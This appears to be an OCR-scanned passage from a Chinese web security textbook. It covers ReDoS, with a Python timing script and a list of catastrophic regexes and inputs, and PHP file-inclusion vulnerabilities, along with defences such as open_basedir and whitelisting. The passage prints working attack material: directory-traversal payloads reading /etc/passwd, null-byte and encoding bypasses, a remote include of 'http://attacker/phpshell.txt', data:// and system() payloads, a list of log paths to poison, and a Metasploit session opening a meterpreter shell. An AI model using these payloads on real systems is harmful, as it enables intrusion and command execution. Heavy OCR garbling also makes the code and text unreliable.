这 极 大 地 增加 了 正则 引擎 解析 数据 时 的 消耗 。 当 用 户 恶意 构造 输入 
BY, EEG RA EU AAD SEA AS Bt (比如 CPU 和 
A) ， 从 而 导致 整 台 服务 器 的 性 能 下 降 ， 表 现 的 结果 是 系统 速度 很 
慢 ， 有 的 进程 或 服务 失去 啊 应 ， 与 拒绝 服务 的 后 采 是 一 样 的 。 


整 上 面 这 个 正则 表达 式 来 说 ， 我 们 可 以 进行 一 项 测试 ， 测 试 代码 如 
T: 


# 

# retime.py - Python test program for 
regular expression DoS attacks 

# 
# This test program measures the execution 
time of the Python regular expression 

# matcher to determine if it has problems 
with regular expression denial-of-service 
(ReDoS) 
# attacks. A ReDoS attack becomes possible 
in applications which use poorly written 
regular 
# expressions to validate user inputs. An 
improperly written regular expression has an 
# exponential run time when given a non- 
matching string. Character strings as short 
as 

# 30 characters can cause problems. 

# 

# The following WikiPedia article provides 
more information about the ReDoS problem: 

# 

# http://en.wikipedia.org/wiki/ 

Regular expression Denial of Service - ReDoS 
# 

# This program has been tested with both 
CPython and IronPython. Versions of the 

# test program for C#, Java, JavaScript, 
Perl, and PHP are also available at: 


http: //www.computerbytesman.com/redos 
Author: Richard M. Smith 


Please send comments, questions, additions, etc. to info@computerbytesman.com 


Test parameters 


dk dk db dk dk dk dk dt dk dt 


# regex: String containing the 
regular expression to be tested 

# maketeststring: A function which 
generates a test string from a length 
parameter 

# maxiter: Maximum number of test 
iterations to be performed (typical value is 
50) 

# maxtime: Maximum execution time 
in seconds for one iteration before the test 
program 

# is terminated (typical 
value is 2 seconds) 

# 

regex = r"A(at+)+$" 

maketeststring = lambda n: "a" * n+ "I" 
maxiter = 50 


maxtime 2 

# 

# Python modules used by this program 
# 

import re 


import time 
import sys 


# 
# Main function 
# 
def main(): 

print 

print "Python Regular Expression DoS 
demo" 

print "from 
http: //www.computerbytesman.com/redos" 

print 

print "Platform: 96s 96s" 96 
(sys.platform, sys.version) 

print "Regular expression 96s" 96 
(regex) 

print "Typical test string: 96s" 96 
(maketeststring(10) ) 

print "Max. iterations: 9ed" 96 
(maxiter) 

print "Max. match time: %d sec%s" 96 
(maxtime, "s" if maxtime != 1 else "") 

print 

cregex = re.compile(regex) 

for i in xrange(1, maxiter): 

time - runtest(cregex, i) 
if time » maxtime: 


break 
return 


* Run one test 
# 
def runtest(regex, n) 
teststr = maketeststring(n) 
starttime = time.clock() 
match = regex.match(teststr) 
elapsetime = int((time.clock() - 
starttime) * 1000) 
count = 0 
if match != None: 
count = match.end() - match.start() 
print "For n=%d, match time=%d msec%s, 
match count=%s" % (n, elapsetime, "s" if 


elapsetime == 1 else "", count) 
return float(elapsetime) / 1000 
if name == " gain ": 
main() 


测试 结 采 如 下 : 


Python Regular Expression DoS demo 
from http: //www.computerbytesman.com/redos 


Platform: win32 2.6 (r26:66714, 
Nov 11 2008, 10:21:19) [MSC v.1500 32 bit 
(Intel)] 

Regular expression ^(a*)*$ 

Typical test string:  aaaaaaaaaa! 

Max. iterations: 50 

Max. match time: 2 secs 

For n=1, match time=0 msec, match count=0 
For n=2, match time=0 msec, match count=0 
For n=3, match time=0 msec, match count=0 
For n=4, match time=0 msec, match count=0 
For n=5, match time=0 msec, match count=0 
For n=6, match time=0 msec, match count=0 
For n=7, match time=0 msec, match count=0 
For n=8, match time=0 msec, match count=0 
For n=9, match time=0 msec, match count=0 


a++ (a*)* 

charclass* ([a-zA-Z]+)* 

a or aa (alaa)+ 

a or a (ala?)+ 

aT. «(.%a) eta} 

a 65 (.*a){65} 

Friedl ([^NN"']*)* 

#--------------- Same as above again 
enclosed in ^and $ ---------------- 
start_at+ A(a+)+$ 

start charclass ^([a-zA-Z]*)*$ 
start a or aa ^(a|aa)*$ 
start a or a ^(a|a?)*$ 

start a 11 ^(.*a)(11)$ 

start a 65 4(.*a){65}$ 

start Friedl ^([^NN"']*)*$ 


OWASP ^[a-zA-Z]*(([' S, Ns. N- ][a-zA-Z ])?[a-zA- 
z]*)*$ 

DataVault A\[(,.*)*\]$ 

EntLib ^([^"]4) (2:NN([^"]4))*$ 

Java Classname ^(([a-z])*.)*[A-Z]([a-z])*$ 
Cox 10 a?a?a?a?a?a?a?a?a?a?aaaaaaaaaa 

Cox 25 a?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a? 
a?a?a?a?a?a?aaaaaaaaaaaaaaaaaaaaaaaaa 


EJET, tH np ELS Fd EA P a a A ol So UE 1E DU] 3S i X m f£ TE ReDOS 问 
题 。 


a 12X aaaaaaaaaaaaX 

a 18X aaaaaaaaaaaaaaaaaaX 

a 33X aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaX 

a 49X 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaX 

Cox 10 aaaaaaaaaa 

Cox 20 aaaaaaaaaaaaaaaaaaaa 


Cox 25 aaaaaaaaaaaaaaaaaaaaaaaaa 
Cox 34 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
Java Classname 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! 
EmailValidation 
a@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ! 
EmailValidatiox 
a@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaX 
invalid_Unicode (.+)+\u0001 
DataVault_DOS [ppp 
EntLib DoS NNNNNNNNNNNNNNNNNNNNNNNNNANNNANNNN 
EntLib DoSX NNNNNNNNNNNNNNNNNNNNNNANNNANNNANN 
"X 


人 


虽然 正则 表达 式 的 解析 算法 有 可 能 实现 得 更 好 一 些 ， 但 是 流行 语言 为 
了 提供 增强 型 的 解析 引擎 ， 仍 然 使 用 了 “na?ve algorithm”， 从 而 使 得 在 
很 多 平台 和 开发 语言 内 置 的 正则 解析 引擎 中 都 存在 类 似 的 问题 。 


在 今天 的 互联 网 中 ， 正 则 表达 式 可 能 存在 于 任何 地 方 ， 但 只 要 任何 一 
个 环节 存在 有 缺陷 的 正则 表达 式 ， 融 都 有 可 能 导致 一 次 ReaDOS。 可 能 
使 用 了 正则 表达 式 的 地 方 


hr 
i 
X Va 
E iu 
5 


Ne IIS! 
1 | Web Application DataBase 


Web Browser 


在 检查 应 用 安全 时 ， 一 定 不 能 忽略 ReDOS 可 能 造成 的 影响 。 在 本 节 中 
0 
Tit F S 


13.7 小 结 

在 本 章 中 讲述 了 应 用 层 拒 绝 服务 攻击 的 原理 和 解决 方案 。 应 用 层 拒绝 
服务 攻击 是 传统 的 网 络 拒绝 服务 攻击 的 一 种 延伸 ， 其 本 质 也 是 对 有 限 
资源 的 无 限制 滥用 所 造成 的 。 所 以 ， 解 决 这 个 问题 的 核心 思路 就 是 限 
制 每 个 不 可 信任 的 资源 使 用 者 的 配额 。 

在 解雇 应 用 层 拒 绝 服务 攻击 时 ， 可 以 采用 验证 码 ， 但 验证 码 并 不 是 最 
好 的 解决 方案 。Yahoo 的 专利 为 我 们 提供 了 更 宽广 的 思路 。 

在 本 章 最 后 介绍 了 ReDOS 这 种 比较 特殊 的 拒绝 服务 攻击 ， 在 应 用 安全 
中 需要 注意 这 个 问题 。 


第 14 章 ”PHP 安全 


PHP 是 一 种 非常 流行 的 Web 开 发 语言 。 在 Python、Ruby 等 语言 兴起 的 
今天 ，PHP 仍 然 是 众多 开发 者 所 喜爱 的 选择 ， 在 中 国 尤 其 如 此 。PHP 
的 语法 过 于 灵活 ， 这 也 给 安全 工作 市 来 了 一 些 困扰 。 同 时 PHP 也 存在 
很 多 历史 遗留 的 安全 问题 。 在 PHP 语 言 诞生 之 初 ， 互 联网 安全 问题 尚 
不 突出 ， 许 多 今天 已 知 的 安全 问题 在 当时 并 未 显现 ， 因 此 PHP 语 言 设 
计 上 一 开始 并 没有 过 多 地 考 虚 安 全。 时 至 今日 ，PHP 泪 留 下 来 的 历史 
安全 问题 依然 不 少 ， 但 PHP 的 开发 者 与 整个 PHP 社 区 也 想 做 出 一 些 改 
变 。PHP 语 言 的 安全 问题 有 其 自身 语言 的 一 些 特点 ， 因 此 本 章 单独 拿 
出 PHP 安 全 进行 讨论 ， 也 是 对 本 书 其 他 章节 的 一 个 补充 。 


141 文件 包含 漏洞 

严格 来 说 ， 文 件 包含 漏洞 是 “代码 注入 ”的 一 种 。 在 “注入 攻击 ”一 章 中 ， 

曾经 提 到 过 “代码 注入 ”这 种 攻击 ， 其 原理 就 是 注入 一 段 用 户 能 控制 的 

并 让 服务 器 端 执 行 。“ 代 码 注 入 ”的 典型 代表 就 是 文件 包 
& (File Inclusion) 。 文 件 包 含 可 能 会 出 现在 JSP、PHP、ASP 等 语言 

中 ， 常 见 的 导致 文件 包 SERT 


PHP: include(), include. O ih re(), re-qui ce(), fopen(), readfile(), ... 
JSP/Servlet: ava.io.File(), r4 il-eReade MS Bie 
ASP: include file, include PUT, 


在 互联 网 的 安全 历史 中 pHP 的 文件 包含 漏洞 已 4 SRI TS, ANS 
ee 含 漏洞 ， 且 后 果 
常 


文件 包含 是 PHP 的 一 种 常见 用 法 ， 主 要 由 4 个 钞 数 完成 : 


require once() 


当 使 用 这 4 个 函数 包含 一 个 新 的 文件 时 ， 该 文件 将 作为 PHP 代 码 执行 ， 
PHP 内 核 并 不 会 在 意 该 被 包含 的 文件 是 什么 类 型 。 所 以 如 果 被 包含 的 是 
txt 文 件 、 图 斤 文 件 、 远 程 URL ， 也 都 将 作为 PHP 代 码 执行 。 这 一 特 
性 ， 在 实施 攻击 时 将 非常 有 用 。 比 如 以 下 代码 : 


x p 
nclu de($ GET[test]); 


3LARIB SE RICE WANT 


¢ CQ yw. a. con/test. php?test=fortest. txt 


Notice: Use of undefined constant test - assumed ‘test’ in D:\soft\develop\env\sites\www. a. com\test. php on line 3 
for test!!!! 


这 个 txt 文 件 中 包 舍 了 可 执行 的 PHP 代 码 时 : 


text. txt ut - 
XO AED Texto BW hap 


再 执行 漏洞 URL， 发 现代 码 被 执行 了 : 


€ Q (O www. a. con/test. pnp?testetortest. txt 


Notice: Use of undefined constant test - assumed ‘test’ in D:\soft\develap\env\sites\www. a. comMtest. php on line 3 
for testi!!! 


Syrtes = |Wndows NT ALIBABA-39058 5.1 build 2600 
Build Date [Way 2 2008 10:01:20 
M Imalogo configure js "-7enable-ssapshot-build" "-7with-gd: shared" "—rith-entra7ineludes-C. Vrogran Files 
heresoft 
SU Enclode; C: PBOGRA ZMITCROS 2 V MUSCLUDE; C: VPROGIA 2 MICLCROS ZA CGU IH LYE C : \PROGRA2 MILCRUS E ORO EFCC LUD” 
"i th-extraslibsst: \Progras Piles (x66) Mh erosoft 
SOK\LSb;C: VPROGRA 2 WTCROS "2 WCGB LIB ; C: APROGRA 2 MITCAROS 2 WOO WIFCMLTR 7 
Server API [Apache 2.0 Kandler 


Virtual enabled 
Birectory 


Loaded D. Asoft\dewel oplonv\FHIS\php ini 
Confiruratien 


phpinfo() 范 数 被 执行 
要 想 成 功利 用 文件 包含 漏洞 ， 需 要 满足 下 面 两 个 条 件 : 
(1) include0O 等 函数 通过 动态 变量 的 方式 引入 需要 包含 的 文件 ; 
(2) 用 户 能 够 控制 该 动态 变量 。 
下 面 我 们 深入 看 看 文件 包含 漏洞 还 可 能 导致 哪些 后 果 。 
14.1.1 本 地 文件 包含 
能 够 打开 并 包含 本 地 文件 的 漏洞 ， 被 称 为 本 地 文件 包含 漏洞 (Local 
File Inclusion， 人 简称 LEI) 。 比 如 下 面 这 段 代 码 ， 就 存在 LFI 漏 洞 。 


<?php 
$file = $ GET['file']; // "../../etc/passwd 
NO" 


if (file exists('/home/wwwrun/'. 
$file.'.php')) 

// file exists will return true as the 
file /home/wwwrun/../../etc/passwd exists 

include '/home/wwwrun/'.$file.'.php'; 

// the file /etc/passwd will be included 


E 


FA P Be fe Ti] BV file, 4 file HJE X “../../etc/passwd” hj, PHP Tfj 
[H]/etc/passwd CF ° (BEEE, ARERR) a a: 

这 种 写法 将 变量 与 字符 串 连 接 起 来 ， 假 如 用 户 控 制 $file 的 值 
为 “../../etc/passwd” 时 ， 这 上 段 代 人 码 相当 于 : 

被 包含 文件 实际 上 是 “/etc/passwd.php”， 但 这 个 文件 其 实 是 不 存在 的 。 
PHP 内 核 是 由 C 语 言 实现 的 ， 因 此 使 用 了 C 语 言 中 的 一 些 字符 串 处 理 函 
数 。 在 连接 字符 串 时 ，0 字 节 (\x00) 将 作为 字符 串 结 束 符 。 所 以 在 这 


个 地 方 ， 攻 击 者 只 要 在 最 后 加 入 一 个 0 字 方 ， 束 能 截断 fle 变 量 之 后 的 字 
FR, Bp: 

通过 Web 输 入 时 ， 只 需 UrlEncode， 变 成 : 

字符 串 截 断 的 技巧 ， 也 是 文件 包含 中 最 稼 用 的 技巧 。 

但 在 一 般 的 Web 应 用 中 ，0 字 节 用 户 其 实 是 不 需要 使 用 的 ， 因 此 完全 可 
以 禁用 0 字 节 ， 比 如 : 


<?php 
function getVar ($name) 


{ 
$value = isset($_GET[$name]) ? 
$_GET[$name] : null; 
if (is_string($value)) { 
alue = str_replace("\o", '', 


$value); 


J 
? 


但 这 样 并 没有 解决 所 有 问题 ， 国 内 的 安全 研究 者 cloie 发 现 了 一 个 技巧 
一 一 利用 操作 系统 对 目录 最 大 长 度 的 限制 ， 可 以 不 需要 0 字 届 而 达到 截 
断 的 目的 。 目 录 字 符 串 ， 在 Windows 下 256 字 节 、Linux 下 4096 字 节 时 会 
ASR AE, MAKE ZNSE ERE © UP HI ATA 
目录 呢 ? 通过 “./” 的 方式 即 可 ， 比 如 : 

或 者 


/1/1/111111111/1///abc 


或 者 

除了 indude() 等 4 个 函数 外 ，PHP 中 能 够 对 文件 进行 操作 的 函数 都 有 可 
能 出 现 漏洞 。 虽 然 大 多 数 情 况 下 不 能 执行 PHP 代 码 ， 但 能 够 读 取 敏感 文 
CPAP ORE la aR te LEB BEY) o 


文件 包含 漏洞 能 够 读 取 敏 感 文件 或 者 服务 器 端 脚本 的 源 代码 ， 从 而 为 
攻击 着 实施 进一步 攻击 黄 定 基础 。 


€ Q http://www, ensun. net/ content, help. php? nodu ezcontent, hel pnessageli stlhelpid-. ./../../../ete/passwd 


pi ANENA OAS HELE A RSS RE 


he, 

EB: 

V iB eie 
最 新 消息 
AAMT HBA | 
*TPRSIREEEFES ER 
客服 中心 


$e sus gnum 


1v Mann a 


文件 包 售 漏洞 读 外 了 /Cpasswd 的 信息 
LMM AE PALS, HAT eax 


B 


il], 


?62e962e962£55 [n] T .. 
962e962e/55 [A] T- ../ 
..962 £55 [R] T- ../ 
962e962e965c55 [RE] F..\ 
962e962e S5 [iR] F..\ 


PEST mean RA 


IEE a as GAETA 


BEIM 


rooty:(:(:rootyrootybin/bash binvvlsL:biny/ bi n daer 
admos3sadmy/var/admy/sbin/nologin Ip: dp: 

shutdowno6:O:shutdowns/sbins/sbin/shutdown haltz: 
Isbin/t 
operatoracLL:operatory/ 
gopheroal 


bin/nologi 


[spool 
T4Hhalt/bi 


gopher;/var/gopher;/sbin/nologin ftp:-14:50FTP U 


llpd;/sbin/nologin sync::54: 


pin/nologin dhusecBLs8L:System message busy/y/shin/nologin vcsascb £69: 


y a Y Google 


MAEN MANA 


ZWWWIIdehk 


on»:22:daemon:/sbin:/sbin/nologin 


v/bin/syne 


bin/halt mails: spool/mall 


ologin neus: c3 3mews;/etc/nevs;/sbin/nologin uucpecLOddsuucpy/var/spool/wucpy/sbin/nalogin 
ot/sbin/nologin gamess:12:100:games:/usr/games:/s 


bin/nologin 
ser;/var/ttpy/sbin/nologin 
rtual console 


nobody:99:99Nobo 

memory owner; dev;/sbin/nologin rpm»:37:37:/var/llb/rpm:/sbin/ 
[sbin/nologin netdumps34:34:Network Crash Dump user:/varjcra 
[sbin/nologin sshdo:74;74:Privilege-separated $SHy/var/empty/ssh 


ologin haldaemonos68:68:HAL daemon; 
shybin/bash nscdos28:28NSCD Daemony) 
3232 ortmapper RPC usery/: 


dh/sbin/nologin rpc 


/sbin/nologin mallnulls747/var 
rpcusers29:29:RPC Service Use 
/hb/nfsy/sbin/nologin pcap:c7 
sod ?dy Font Serveryetc/11/fsy/sbin/nologin ntp»:38:30:/eto 
OpenPegasus ABEM/CIM services: Vi” an 


login a 
thinthach onion TINGA Corners lowenlthin th ach fn 


/spool/mqueue:/sbin/nologin sr 
/hk/nfs:/sbin/nologin nfsnobo 


^varjarpwatch:/sbin/nologin eh ARAB Apachey/var/wwwn/sbin/ 


mspoc5L:5Ls/var/spoal/mqueuey/shin/nologin 
0j»:5534:65534:4nonymous NFS Usery/var 


nologin 

tp:/sbin/nologin pegasush6:65tog-peqasus 
mandav336:4manda user; 
Anal MEAM nm hd eniin lehall ian 


Iib/amanda: 


atte hui 


文 样 的 方式 来 返回 到 上 层 目 
这 种 方式 又 被 称 为 “目录 遍历 ” (Path Traversal) 


。 T8 ILES H SKIN 


还 可 以 通过 不 同 的 编码 方式 来 绕 过 一 些 服 务 器 剖 逻 辑 。 


© ..%5c 等 同 于 .\ 
© 96252e96252e96255c55 lal F..\ 
。 ..%255c 等 同 于 ..\ and so on. 


某 些 Web 容 此 文 持 的 编码 方式 .: 


© ..%c0%af 等 同 于 ../ 
© ..%c1%9c 等 同 于 .\ 


比如 CVE-2008-2938， 就 是 一 个 Tomcat 的 目录 人 遍历 漏洞 。 

如 有 果 context.xml 或 server.xml 人 允许 'al-lowLinking' 和 'URIencoding' 为 'UTF- 
8 ， 攻 击 者 瓯 可 以 以 Web 权 限 获得 重要 的 系统 文件 内 容 。 

E se ie 77 ies el Ae — PP ES 8S A OK GEBOTE RJ 2I I5, {2 4 PHPAC SE T 
open_basedir 时 ， 将 很 好 地 保护 服务 器 ， 使 得 这 种 攻击 无 效 。 


open_basedir 的 作用 是 限制 在 某 个 特定 目录 下 PHP 能 打开 的 文件 ， 其 作 
用 与 safe_mode 是 否 开 局 无 关 。 

当 没 有 设置 open_basedir 时 ， 文 件 包含 漏洞 可 以 访 
问 任意 o 


© Q Qm. a. conftest. php?testz. fo fo JJ. e e e e e e e fa tet 


Notice: Use of undefined constant test - assumed test! in D:\soft\develop\env\sites\www. a. com\test. php on line 3 
for test! !!! 


测试 页 面 
当 设 置 了 open_basedir 时 : 


; open basedir, if set, limits all file 
operations to the defined directory 
; and below. This directive makes most 
sense if used in a per-directory 

or per-virtualhost web server 
configuration file. This directive is 
; *NOT* affected by whether Safe Mode is 
turned On or Off. 
open_basedir = D:\soft\develop\env\sites 
\www.a.com\ 


文件 包含 失败 : 


€ Q O vrr. a contest php?te $466 


Notice: Use of undefined constent test — assumed ‘test’ in D:\soft\develop\env\sites\www. a. com\test. php on line 3 


Warning: inc - ) (function include]: open_basedir restriction in effect，Filet AAA At is not within the 
allowed path(s): (D:\soft\develop\env\sites\www. a. com). in D:\soft\develop\cnv\sites\www. a. com\test. php on line 3 


Warning: includel../../.././-/ AAA AAA txt) [hanciion include): failed to open stream: Operation not pernitted in 
D:\soft\devel op\env\sites\www. n. com\test. php on line 3 


Warning: include() (function, include]: Failed opening [At for inclusion 
(include pathr’. -C:\php$\pear’) in D: \soft\developienvisi tos n. à. com\test. php on line 3 


测试 页 面 


音 误 提 = 
HEXTE/h: 
Warning: include() [function.include]: 
open basedir restriction in effect. 
File(o d so ES uf fl d suf ai osa vals 
ad /x.txt) is not within the 
allowed path(s): (D:\soft\develop\env\sites 
\www.a.com\ 
in D:\soft\develop\env\sites\www.a.com 
\test.php on line 


需要 注意 的 是 ，open_basedir 的 值 是 目录 的 前 级 ， 因 此 假设 设置 如 下 : 


open_basedir = /home/app/aaa 


那么 实际 上 上， 以 下 目 隶 部 是 在 允许 旋 围 内 的 。 


/home/app/aaa 
/home/app/aaabbb 
/home/app/aaa123 


如 果 要 限定 一 个 指定 的 目录 ， 则 需要 在 最 后 加 上 “/" - 


open basedir = /home/app/aaa/ 


f£Windows F Z^ ARV 4A Shar, Linux PA Shar » 


要 解决 文件 包含 漏洞 ， 应 该 尽量 避免 包含 动态 的 变量 ， 尤 其 是 用 户 可 
以 控制 的 变量 。 一 种 变通 方式 ， 则 是 使 用 枚 举 ， 比 如 : 


<?php 
$file = $ GET['file']; 
// Whitelisting possible values 
switch ($file) ( 

case main’: 

case 'foo' 

case 'bar' 

include ' /home/wwwrun/include/' 


main.php'; 


sfile 的 值 被 枚 举 出 来 也 就 避免 了 任意 文件 包含 的 风险 。 


14.1.2 ”远程 文件 包含 

如 霖 PHP 的 配置 选项 allow_ url_include 为 ON 的 话 ， Jlinclude/require E53 
是 可 以 加 载 远程 文件 的 ， 这 种 漏洞 被 称 为 远程 文件 包含 漏洞 (Re-mote 

File Inclusion, f&jERRFI) 。 比 如 如 下 代码 : 


<?php 
if ($route == "share") ( 
require once $basePath . '/action/ 
m share.ph 
) elseif (SO == "sharelink") { 


require once $basePath . '/action/ 
m sharelink.php'; 


在 变量 $basePath 前 没有 设置 任何 障碍 ， 因 此 攻击 者 可 以 构造 类 似 如 下 
的 攻击 URL 。 


最 终 加 载 的 代码 实际 上 执行 了 : 


require once 'http://attacker/phpshell.txt?/ 
action/m share.php'; 


问号 后 面 的 代码 被 解释 成 URL 的 querys-tring， 也 是 一 种 “截断 >， 这 是 在 
利用 远程 文件 包含 漏洞 时 的 前 见 技巧 。 同 样 的 ，%00 也 可 以 用 做 截断 符 
B. 

远程 文件 包含 漏洞 可 以 直接 用 来 执行 任意 命令 ， 比 如 在 攻击 者 的 服务 
an LTE ROCHE: 


<?php 
echo system("ver;"); 
?» 


包含 远程 文件 后 ， 获 得 命令 执行 : 


《 Q Q vw. a. con/ test. php?test-http:/ /wnr. b. con/testl. txt? 


Notice: Use of undefined constant test - assumed "test! in D:\soft\develop\env\sites\www. a. com\test. php on line 3 
Microsoft Windows XP [版 本 5.1.2600] Microsoft Windows XP [版 本 5.1.2600] 


系统 命令 被 执行 
14.1.3 ”本 地 文件 包含 的 利用 技巧 
ee 其 实 也 是 有 机 会 执行 PHP 代 码 的 ， 这 取决 于 一 些 条 
远程 文件 包 全 漏洞 之 所 以 能 够 执行 命令 ， 束 是 因为 攻击 痢 能 够 目 定 义 
被 包含 的 文件 内 容 。 因 此 本 地 文件 包含 漏洞 想 要 执行 命令 ， 也 需要 找 
到 一 个 攻击 者 能 够 控制 内 容 的 本 地 文件 。 
经 过 不 懈 的 研究 ， 安 全 研究 者 总 结 出 了 以 下 几 种 第 见 的 技巧 ， 用 于 本 
地 文件 包含 后 执行 PHP 代 码 。 

(1) 包含 用 户 上 传 的 文件 。 

(2) 包含 data:// 或 php://input 等 伪 协 议 。 

(3) 包含 Session 文 件 。 

包含 日 志文 件 ， 比 如 Web ServerfiJac-cess log ° 

5 

(6) 


包含 /proc/self/environ 文 件 。 
包含 上 传 的 临时 文件 (RFC1867) ° 


(7) 包含 其 他 应 用 创建 的 文件 ， 比 如 数据 库 文件 、 缓 存 文件 、 应 用 日 
志 等 ， 需 要 具体 情况 具体 分 析 。 
包含 用 户 上 传 的 文件 很 好 理解 ， 这 也 是 最 简单 的 一 种 方法 。 用 户 上 传 
e ae) 那么 这 些 代码 被 include() 加 载 后 将 
会 执行 。 
但 包含 用 户 上 传 文件 能 否 攻击 成 功 ， 取 决 于 文件 上 传 功 能 的 设计 ， 比 
如 要 求知 道 用 户 上 传 后 文件 所 在 的 物理 路 径 ， 有 时 这 个 路 径 很 难 狂 
在 本 书 “ 文 件 上 传 漏洞 ”一 章 中 给 出 了 很 多 设计 安全 文件 上 传 功能 
建议 。 
伪 协 议 如 php:/input 等 需要 服务 器 支持 ， 同 时 要 求 allow_url_include 设 置 
为 ON。 在 PHP5.2.0 之 后 的 版 本 中 支持 data: 伪 协 议 ， 可 以 很 方便 地 执 
行 代码 ， ow url include 为 ON ° 


http://ww ample. is ndex.ph 
file-data rte Kt/plak «?php phpi nto( );? 7600 


包含 Scion HELA —! 它 需 要 攻击 者 能 控制 部 分 Session 

文件 的 内 容 。 比 如 : 

PHP 默 认 生 成 的 Session 文 件 往 往 存 放 在 /tmp 目 孙 下 ， 比 如 : 

包含 日 志文 件 是 一 种 比较 通用 的 技巧 。 因 为 服务 器 一 般 都 会 往 Web 

Server 的 access_log 里 记录 客户 端的 请 求 信息 ， 在 error_ log 里 记录 出 错 请 

求 。 因 此 攻击 者 可 以 间接 地 将 PHP 代 码 写 入 到 日 志文 件 中 ， 在 文件 包含 

上 时， 只 需要 包含 日 志文 件 即 可 。 

但 需要 注意 的 是 ， 如 果 网 站 访问 量 大 的 话 ， 日 志文 件 有 可 能 会 很 大 
(比如 一 个 日 志文 件 有 2GB) ， 当 包含 一 个 这 么 大 的 文件 时 ，PHP 进 程 

可 能 会 僵 死 。 但 Web Server 往 往 会 深 动 日 志 志 或 每 天 生成 一 个 新 的 日 志 

文件 。 因 此 在 凌晨 时 包含 日 志文 件 ， 将 提高 攻击 的 成 功 性 ， 因为 此 时 

的 日 志文 件 可 能 非常 小 。 


以 Apache 为 例 ， 一 般 的 攻击 步 又 是 ， 先 通过 读 取 httpd 的 配置 文件 
httpd.conf， 找 到 日 志文 件 所 在 的 目录 。httpd.conf 一 般 会 存在 Apache 的 
Xt X B wm Fa 在 Redhat Z J) RoR Y. e ae B BT Be 
Jj /etc/httpd/conf/httpd.conf , 而 BH x X X A 的 可 能 
在 /usr/local/apache/conf/httpd.conf 为 。 但 更 多 时 候 ， 也 可 能 猜 不 到 这 个 
H3& e 


ji 见 的 H 志文 件 可 能 会 存在 以 下 地 方 : 


access log 
vd naf utk aad anda afl if Il Var/log/httpd/ 


error log 
../apache/1logs/error.log 
../apache/1ogs/access.1og 
../../apache/logs/error.log 
/../apache/logs/access.log 
../../,../apache/logs/error.log 
../../,../apache/logs/access.log 
FM eMe... f ../etc/httpd/logs/ 
ces log 
Midi... ..f.. f... etc/httpd/logs/ 
acces.log 
eMe... f. . /etc/httpd/logs/ 
error log 
edd... f... .fetc/httpd/logs/ 
error.log 
eM edd... .. f .. / Var/ww/logs/ 
access log 
eM edd... .. f ../ Var/ww/logs/ 
access.log 
M eed cM eif i... f. . /USsr/local/ 
apache/logs/access log 
OCR 
apache/logs/access.log 
eed... .. f ../ var/log/apache/ 
access log 
vd ti /var/log/apache/ 
access.log 
pube v n sf vl ved iv eA cifevar/10g/ 
access log 
eM edd... lilies. f .. / Var/ww/logs/ 
error log 
eM edd... a / Var/ww/logs/ 
error.log 
Midi... .. f ../usr/local/ 
apache/logs/error_ log 
Mifc... .. f. ./usr/local/ 
apache/logs/error.log 
eMe... .. f .. / var/log/apache/ 
error log 
eed... ..fl.. f ../ var/log/apache/ 
error.log 
we ad atl hd ad rada kat e VAL TOBA 
access log 
v aZ weil aa ad a di val eid oA VAL LTOdA 
error log 
/var/log/httpd/access log 
/var/log/httpd/error log 
../apache/1logs/error.log 
../apache/1ogs/access.1og 
../../apache/logs/error.log 
../../apache/logs/access.log 
../../,../apache/logs/error.log 
../../,../apache/logs/access.log 
/etc/httpd/logs/acces log 
/etc/httpd/logs/acces.log 
/etc/httpd/logs/error log 
/etc/httpd/logs/error.log 
/var/www/1logs/access log 
/ var /www/1logs/access.log 
/usr/local/apache/logs/access log 
/usr/local/apache/logs/access.log 
/var/log/apache/access log 
/var/log/apache/access.log 
/var/log/access log 
/var/www/1logs/error log 
/var/www/logs/error.log 
/usr/local/apache/logs/error_log 
/usr/local/apache/logs/error.log 
/var/log/apache/error_log 
/var/log/apache/error.log 
/var/log/access_log 
/var/log/error_log 


Metasploit 中 包含 了 一 个 脚本 自动 化 完成 包含 日 志文 件 的 攻击 。 


msf exploit(handler) > use exploit/unix/ 
webapp/php_1fi 
msf exploit(php lfi) > set RHOST 127.0.0.1 
RHOST -» 127.0.0.1 

msf exploit(php lfi) » set RPORT 8181 
RPORT -» 8181 
msf exploit(php lfi) » set URI /index.php? 
foozxxLFIxx 
URI => /index.php?foo=xxLFIxx 

msf exploit(php lfi) > set PAYLOAD php/ 
meterpreter/bind_tcp 

PAYLOAD => php/meterpreter/bind_tcp 

msf exploit(php_lfi) > exploit -z 

[*] Started bind handler 

Trying generic exploits 

Clean LFI injection 

Sending stage (31612 bytes) to 127.0.0.1 
Meterpreter session 1 opened 
7.0.0.1:19412 -> 127.0.0.1:4444) at Tue 
24 14:47:29 


x Mees 


+0200 2011 

C[-] Exploit exception: Interrupt 

[*] Session 1 created in the background. 
msf exploit(php_lfi) > sessions -i 1 

[*] Starting interaction with 1... 
meterpreter > ls 

Listing: /usr/home/test/cherokee/www 


Mode Type Last 
modified Name 


100644/rw-r--r-- 0 fil Tue May 10 
11:09:39 +0200 2011 foo.php 

40755/rwxr -xr -x 512 dir Tue May 10 
10:53:59 +0200 2011../Images 
100644/rw-r--r-- 1795 fil Tue May 10 
10:19:23 +0200 2011 index.html 
100644/rw-r--r-- 37 fil Tue May 10 
13:52:25 +0200 2011 index.php 

meterpreter » sysinfo 

os : FreeBSD redphantom.skynet.ct 
8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 
17 02:41:51 UTC 2011 
root@mason.cse.buffalo.edu:/usr/obj/usr/src/ 
SyS/GENERIC amd64 

Computer : redphantom.skynet.ct 
Meterpreter : php/php 

meterpreter > exit 


其 代码 如 下 : 


# 

# Copyright (c) 2011 GhostHunter 
# All rights reserved. 
# 
# 


Redistribution and use in source and 
binary forms, with or without 
# modification, are permitted provided that 
the following conditions 
# are met: 
# 1. Redistributions of source code must 
retain the above copyright 
# notice, this list of conditions and the 
following disclaimer. 
# 2. Redistributions in binary form must 
reproduce the above copyright 


# notice, this list of conditions and the 
following disclaimer in the 
# documentation and/or other materials 


provided with the distribution. 
# 3. Neither the name of copyright holders 
nor the names of its 


# contributors may be used to endorse or 
promote products derived 

# from this software without specific 
prior written permission. 

# 


